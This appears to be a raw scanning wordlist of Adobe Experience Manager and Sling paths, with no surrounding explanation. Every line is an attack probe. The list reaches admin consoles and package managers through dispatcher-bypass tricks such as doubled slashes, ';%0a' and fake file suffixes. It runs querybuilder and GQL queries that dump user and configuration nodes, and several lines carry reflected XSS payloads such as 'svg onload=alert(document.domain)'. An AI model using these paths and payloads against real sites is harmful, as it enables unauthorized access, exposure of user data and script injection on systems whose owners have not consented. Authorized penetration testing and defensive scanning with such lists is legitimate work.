/groovyconsole
/etc/groovyconsole.html
/groovyconsole.html
/system/console?.css
/crx/explorer/nodetypes/index.jsp
/system/console/bundles
///system///console///bundles
/miscadmin
/mcmadmin#/content/dashboard
/miscadmin#/etc/mobile
/miscadmin#/etc/segmentation
/miscadmin#/etc/blueprints
/miscadmin#/etc/designs
/miscadmin#/etc/importers
/miscadmin#/etc/reports
/miscadmin#/etc/msm/rolloutconfigs
//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json
/etc/designs/xh1x.childrenlist.json//<svg onload=alert(document.domain)>.html
/libs/granite/core/content/login.html
/system/bgservlets/test.css
/crx/packmgr/index.jsp
/libs/cq/ui/content/dumplibs.html
/libs/granite/ui/content/dumplibs.validate.html
/libs/granite/ui/content/dumplibs.rebuild.html
/libs/granite/ui/content/dumplibs.test.html
/libs/granite/ui/content/dumplibs.html
/libs/granite/core/content/login/favicon.ico
/system/sling/loginstatus
/system/sling/loginstatus.css
///system///sling///loginstatus
/libs/dam/merge/metadata.html?path=/etc&.ico
/bin/querybuilder.feed
/bin/querybuilder.json
/bin/querybuilder.json.servlet
///bin///querybuilder.json
///bin///querybuilder.json.servlet
/bin/querybuilder.feed.servlet
///bin///querybuilder.feed
/system/sling/cqform/defaultlogin.html
/system/sling/info.sessionInfo.json
/system/sling/info.sessionInfo.txt
/libs/cq/security/userinfo.json
/dispatcher/invalidate.cache
/crx/explorer/ui/namespace_editor.jsp
/etc
/var
/apps
/home
///etc
///var
///apps
///home
/.json
/.1.json
/....4.2.1....json
/.json?FNZ.css
/.json?FNZ.ico
/.json?FNZ.html
/.json/FNZ.css
/.json/FNZ.html
/.json/FNZ.png
/.json/FNZ.ico
/.children.1.json
/.children....4.2.1....json
/.children.json?FNZ.css
/.children.json?FNZ.ico
/.children.json?FNZ.html
/.children.json/FNZ.css
/.children.json/FNZ.html
/.children.json/FNZ.png
/.children.json/FNZ.ico
/etc.json
/etc.1.json
/etc....4.2.1....json
/etc.json?FNZ.css
/etc.json?FNZ.ico
/etc.json?FNZ.html
/etc.json/FNZ.css
/etc.json/FNZ.html
/etc.json/FNZ.ico
/etc.children.json
/etc.children.1.json
/etc.children....4.2.1....json
/etc.children.json?FNZ.css
/etc.children.json?FNZ.ico
/etc.children.json?FNZ.html
/etc.children.json/FNZ.css
/etc.children.json/FNZ.html
/etc.children.json/FNZ.png
/etc.children.json/FNZ.ico
///etc.json
///etc.1.json
///etc....4.2.1....json
///etc.json?FNZ.css
///etc.json?FNZ.ico
///etc.json/FNZ.html
///etc.json/FNZ.png
///etc.json/FNZ.ico
///etc.children.json
///etc.children.1.json
///etc.children....4.2.1....json
///etc.children.json?FNZ.css
///etc.children.json?FNZ.ico
///etc.children.json?FNZ.html
///etc.children.json/FNZ.css
///etc.children.json/FNZ.html
///etc.children.json/FNZ.png
///etc.children.json/FNZ.ico
/etc/reports/diskusage.html
/etc/reports/diskusage.html?path=/content/dam
/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico
/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix=
/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix=
/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix=
/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=
/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=
/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=
/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=
/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=
/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=
/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix=
/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix=
/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix=
/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix=
/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix=
///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix=
///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix=
///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix=
///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=
///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=
///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=
///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=
///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=
///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=
///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix=
///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix=
///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix=
///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix=
///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix=
/bin.tidy.infinity.json
/bin/wcm/contentfinder/connector/suggestions.json;%0aOJh.css?query_term=path%3a/&pre={{randstr}}
/etc/acs-commons/jcr-compare.html
/etc/acs-commons/workflow-remover.html
/etc/acs-commons/version-compare.html
/etc/acs-commons/oak-index-manager.html
/{{rand_base(4)}}<img src=x data
/{{rand_base(4)}}<br><br>please%20authenticate<br><br>.childrenlist.html
/content.infinity.json
/{{path}}
/libs/granite/offloading/content/view.html
/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1
/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1
/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1
/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1
/libs/granite/security/content/useradmin.html
/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a
/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a
/dam/jcr:content/xxxxxxxxxxxx%27\%22%3E%3Csvg/onload=alert(1)%3E.childrenlist.json.json/ab.html
/etc/importers/bulkeditor.html
/crx/explorer/browser/index.jsp
/crx/explorer/ui/search.jsp
/crx/explorer/ui/search.jsp?Path=&amp;Query=
/crx/explorer/ui/search.jsp?Path=&Query=
/apps.tidy.infinity.json
{{path}}
/etc/linkchecker.html
/var/linkchecker.html
